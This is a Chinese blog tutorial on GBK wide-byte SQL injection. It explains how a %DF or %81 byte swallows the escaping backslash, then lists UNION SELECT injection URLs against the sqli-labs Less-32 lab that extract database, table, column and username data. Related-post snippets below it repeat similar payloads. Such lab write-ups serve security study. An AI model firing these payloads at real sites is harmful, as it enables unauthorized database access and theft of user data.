MySQL注入 -- 宽字节注入

最新推荐文章于 2024-07-26 13:34:44 发布
最新推荐文章于 2024-07-26 13:34:44 发布
阅读量1.8k 收藏 27
点赞数 7
分类专栏: MySQL注入 文章标签: mysql注入 宽字节 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41489908/article/details/117124775
版权

​很多事情,原来努力了,也得不到满意的结果。。。

----  网易云热评

 

一、宽字节注入介绍

1、在注入点输入(')会被转义为(\')编码后为(%5c%27),只有把斜杆去掉才能注入

2、GBK编码表,%DF%5C正好组成( 運),所以会把\"吃掉",0X81-0XFE都可以

二、实例演示

1、获取数据库名称

http://192.168.139.129/sqli/Less-32/?id=1%81' and 1=2 union select 1,2,database() --+

2、获取数据库security的表

http://192.168.139.129/sqli/Less-32/?id=1%df' and 1=2 union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 --+

3、获取下一个表

http://192.168.139.129/sqli/Less-32/?id=1%81' and 1=2 union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 limit 3,1 --+

4、获取表名为users的字段名

http://192.168.139.129/sqli/Less-32/?id=1%81' and 1=2 union select 1,2,column_name from information_schema.columns where table_name=0x7573657273 --+http://192.168.139.129/sqli/Less-32/?id=1%81' and 1=2 union select 1,2,column_name from information_schema.columns where table_name=0x7573657273 limit 11,1--+

5、获取字段内容

http://192.168.139.129/sqli/Less-32/?id=1%81' and 1=2 union select 1,2,username from users --+http://192.168.139.129/sqli/Less-32/?id=1%81' and 1=2 union select 1,2,username from users limit 1,1 --+

 

禁止非法,后果自负

欢迎关注公众号:web安全工具库

欢迎关注视频号:之乎者也吧

web安全工具库
关注
专栏目录
宽字节注入
rane的博客
03-18 295
宽字节注入原理 宽字节注入方法 以第32关为例,输入单引号后会经过check_addslashes函数替换 数据库连接的时候使用的是gbk编码 http://127.0.0.1/Less-32/?id=1%df’ order by 3–+ 三列 http://127.0.0.1/Less-32/?id=-1%df’ union select 1,2,version()–+ 使用union查询需...
MYSQL 宽字节注入
AaronLuo
09-14 417
MYSQL使用了GBK编码会认为两个字符为一个汉字,所以可以使用一些字符和转义过后多出来的\组合两个字符,使得数据库不识别字符,对单引号、双引号的转义失败 宽字节注入的形成过程 当PHP连接MYSQL时,当设置character_set_client = gbk 时会导致GBK编码转换的问题,当注入的参数里带有%df(%bf)时,在魔术引号开关或者addslashes() 函数的作用下,会将%df...
记一次墨者学院sql手工宽字节注入(包含使用sqlmap宽字节注入)
最新发布
qq_56035503的博客
07-26 795
总的来说使用sqlmap的前提是需要知道当前漏洞注入是属于字节注入才行,所以也间接证明了手动注入学习的重要性,只有知道了注入的原理,才能正确的使用脚本,同时sql内容的学习也极其关键,如果不能明白其中的原理,在实战中也不发现不了其中的问题。
MySQL 宽字节注入
m_de_g的博客
12-11 882
MySQL 宽字节注入 1.字节诸如基础 GBK占用两字节 ASCII占用一字节 PHP中编码为GBK,函数执行添加的是ASCII编码,MySQL默认字符集是GBK等字节字符集。 %DF':会被PHP当中的addslashes函数转义为"%DF","“既URL里的“%5C”,那也就是说,“%DF”会被转成“%DF%5C%27”倘若网站的字符集是GBK,MySQL使用的编码也是GBK的话,就会认为“%DF%5C%27”是一个字节。也就是”運'" URL在线解密工具链接: http://tool.chin
MYSQL注入-宽字节注入
告白的博客
08-02 476
0x00 宽字节注入简介 什么是字节: GB2312、GBK、GB18030、BIG5、Shift_JIS这些编码类型都是属于字节,当我们输入的单个字符被转换成ACSII码,当两个ACSII码组合起来会被字节再次编码为特殊文字等类型,即绕过了检验。宽字节注入mysql特有的一种诸注入类型 0x01 宽字节注入案例-SQLI-less-32 尝试判断闭合,发现输入的参数都被转换为ACSII码, 发现单引号被转换为通过查询ACSII码 单引号转换 /’ 而/‘换成 5c27 查询到
mysql宽字节注入
m0_65096687的博客
04-09 183
宽字节注入的核心就是传一个字符是反斜杠成为有个汉字。在查表名的时候,会出现databse='表名'两个编码可能是两个字节,也有可能是有个字节数据库使用GBK编码可能存在宽字节注入。因为魔术引号,遇到单引号就会加反斜杠转义。如果注入方式使post,就无法修改了。%df和\可以组成一个汉字,运。告诉系统这是16进制,而不是数字。,就会变成一个这样的字符串。直接把表名编译为16进制。需要让别人知道这是16进制。因为有了魔术引号的防御。MySQL支持16进制。但是16进制是一窜数字。汉字变成ascii数字。
第十九节 字节SQL注入-01
09-15
宽字节注入代码分析 在字节SQL注入攻击中,攻击者可以使用 Php 的addslashes 函数来转义特殊字符,例如将“'”转义为“%DF\'”。然后,在MYSQL中,这个字符将被认为是一个合法的字符,从而 bypass 数据库的安全...
CTF---Web---SQL注入---05---MongoDB+宽字节注入
qq_22160557的博客
07-29 879
文章目录前言一、题目描述二、解题步骤1、分析传入参数2、判断注入方式3、宽字节注入三、总结 前言 题目分类: CTF—Web—SQL注入—05—MongoDB+宽字节注入 一、题目描述 题目:研究生的秘密 二、解题步骤 1、分析传入参数 Step1:http://192.168.87.173/index.php?title=Mysql%20%E6%95%99%E7%A8%8B ,查看源代码,,只有title的值等于页面的参数时,content才有内容 2、判断注入方式 Step2:当title=1时
MySQL注入--Payload
m0_37595954的博客
10-25 1166
MySQL注入--Payload Mirror王宇阳 2019-10-22 SQL的注入流程一般如下: 1、判断是否有SQL注入漏洞(判断注入点) 2、判断 数据库的系统架构、数据库名、web应用类型等 3、获取数据库信息 4、加密信息破解 5、进行提权 前篇 注入漏洞分类: 数字型注入: 当输入(注入)的参数为整数,则可以认为该漏洞注入点为数字型注入; htt...
sqli-labs学习笔记(十一)less 32-37 宽字节注入
闵行小鱼塘
09-18 712
继续学习sqli-labs,本篇是less 32-37
sqlmap跑宽字节注入(渗透测试之SQL注入宽字节注入)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-09 923
宽字节注入就是用一个大于128的十六进制数来吃掉转义符,gbk编码,字节作为一个字符的编码手工注入 一、什么是宽字节注入 字节是相对于ascII这样单字节而言的;像 GB2312、GBK、GB18030、BIG5、Shift_JIS 等这些都是常说的字节,实际上只有两字节。GBK 是一种多字符的编码,通常来说,一个 gbk 编码汉字,占用2个字节。一个 utf-8 编码的汉字,占用3个字节。 转义函数:为了过滤用户输入的一些数据,对特殊的字符加上反斜杠“\”进行转义; 宽字节注入指的是 mysql 数据
MYSQL注入宽字节注入
cj_Hydra's Blog
04-16 488
一、经典sql注入漏洞 当前例子1中并没有对$_GET[‘name’]的值进行过滤,所以是存在sql注入漏洞的。 <?php $name=$_GET['name']; $conn=mysql_connect('localhost','root','root'); if($conn==null){exit("connect error !<br>");} mysql...
MySQL总结二 宽字节注入
xiaopan233的博客
05-08 530
MySQL宽字节注入 MySQL有很多字符集。要明白宽字节注入是什么。首先先了解一下MySQL中支持的字符集。 官方文档中可知。通过命令 SHOW CHARACTER SET; 可以知道我们的MySQL所支持的字符集。 我们来看看我们进行测试的数据库支持的字符集 本次测试使用的是gbk字符集。其他的字符集能不能注入还有待研究一下。。。。 可以看到gbk的字节长度为2 ...
mysql sql宽字节注入_SQL注入宽字节注入
weixin_36173034的博客
02-07 402
About SQL Injection宽字节注入0x01 前言对于SQL注入,我估计搞安全的都玩的滚瓜烂熟了,搞站什么的都是分分钟来的,但是之前做了一道宽字节注入的题目,又打开了我一扇通往新世界的大门(PS:早都碰到过,只不过一直没有时间写)。0x02 字节mysql字节字符集: 所有的字符都使用一个字节来表示,比如 ASCII 编码。多字节字符集: 在多字节字符集中,一部分字节用多个字节来...
mysql sql宽字节注入_宽字节注入详解
weixin_28856341的博客
02-07 234
科普:宽字节注入详解在mysql中,用于转义的函数有addslashes,mysql_real_escape_string,mysql_escape_string等,还有一种情况是magic_quote_gpc,不过高版本的PHP将去除这个特性。作者:lxsec来源:网络安全***实验室|2014-04-08 16:0251CTO技术栈51CTO微站服务号51CTO学院客户端前言在mysql中,用...
mysql宽字节注入_转宽字节注入详解
weixin_31514917的博客
01-28 154
mysql中,用于转义的函数有addslashes,mysql_real_escape_string,mysql_escape_string等,还有一种情况是magic_quote_gpc,不过高版本的PHP将去除这个特性。首先,宽字节注入与HTML页面编码是无关的,笔者曾经看到<meta charset=utf8>就放弃了尝试,这是一个误区,SQL注入不是XSS。虽然他们中编码的成...
mysql sql宽字节注入_SQL注入--宽字节注入
weixin_34940781的博客
02-07 91
PHP测试代码:// 面向对象写法$id=addslashes($_GET[‘id’]); //获取id并转义预定义字符// /$id=$_GET[‘id’];$mysqli=new mysqli(‘localhost’,’root’,’root’,’test’); //连接数据库 指定数据库if ($mysqli->connect_errno) { //判断错误信息die(‘Connect...
mysql sql宽字节注入_Mysql宽字节注入(转)
weixin_34550241的博客
01-18 124
尽管现在呼吁所有的程序都使用unicode编码,所有的网站都使用utf-8编码,来一个统一的国际规范。但仍然有很多,包括国内及国外(特别是非英语国家)的一些cms,仍然使用着自己国家的一套编码,比如gbk,作为自己默认的编码类型。也有一些cms为了考虑老用户,所以出了gbk和utf-8两个版本。我们就以gbk字符编码为示范,拉开帷幕。gbk是一种多字符编码,具体定义自行百度。但有一个地方尤其要注意...
13.SQL注入-字节
愿听风成曲
07-07 574
MySQL是用的PHP语言,然后PHP有addslashes()等函数,这类函数会自动过滤 ’ ‘’ null 等这些敏感字符,将它们转义成’ ‘’ \null;然后字节字符集比如GBK它会自动把两个字节的字符识别为一个汉字,所以我们在单引号前面加一个%df,从而使单引号逃逸。字节注入条件有两个:1.数据库编码设置成GB系列这里说的GB系列编码,不是指PHP页面的编码,而是连接数据库使用的编码。
MySQL练习:注入语句详解与宽字节注入
宽字节注入通常发生在服务器使用多字节字符集(如GBK)时。攻击者通过插入特殊字符来改变SQL语句的解释。例如,可以使用%df来处理转义字符',使其失效,如`' or 'a'='a%df'`。 - 条件:目标程序使用双/多字节字符...
评论 10
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

web安全工具库

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值